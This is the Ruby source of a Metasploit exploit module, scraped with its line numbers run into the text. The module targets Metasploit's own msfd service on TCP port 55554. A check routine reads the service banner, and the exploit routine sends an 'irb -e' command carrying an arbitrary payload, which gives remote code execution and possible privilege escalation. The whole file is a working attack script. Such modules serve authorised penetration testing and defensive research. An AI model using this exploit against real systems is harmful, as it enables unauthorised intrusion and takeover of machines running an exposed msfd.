Path: blob/master/modules/exploits/multi/misc/msfd_rce_remote.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Metasploit msfd Remote Code Execution',15'Description' => %q{16Metasploit's msfd-service makes it possible to get a msfconsole-like17interface over a TCP socket. If this socket is accessible on a remote18interface, an attacker can execute commands on the victim's machine.1920If msfd is running with higher privileges than the current local user,21this module can also be used for privilege escalation. In that case,22port forwarding on the compromised host can be used.2324Code execution is achieved with the msfconsole command: irb -e 'CODE'.25},26'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',27'License' => BSD_LICENSE,28'Platform' => "ruby",29'Arch' => ARCH_RUBY,30'Payload' => {31'Space' => 8192, # Arbitrary limit32'BadChars' => "\x27\x0a",33'DisableNops' => true34},35'Targets' => [36[ 'Automatic', {} ]37],38'Privileged' => false,39'DisclosureDate' => '2018-04-11', # Vendor notification40'DefaultTarget' => 0,41'Notes' => {42'Reliability' => UNKNOWN_RELIABILITY,43'Stability' => UNKNOWN_STABILITY,44'SideEffects' => UNKNOWN_SIDE_EFFECTS45}46)47)4849register_options(50[51Opt::RPORT(55554)52]53)54end5556def check57connect58data = sock.get_once59if data.include?("msf")60disconnect61return Exploit::CheckCode::Appears62end63disconnect64return Exploit::CheckCode::Unknown65end6667def exploit68connect69sock.get_once70sock.put "irb -e '" + payload.encoded + "'\n"71disconnect72end73end747576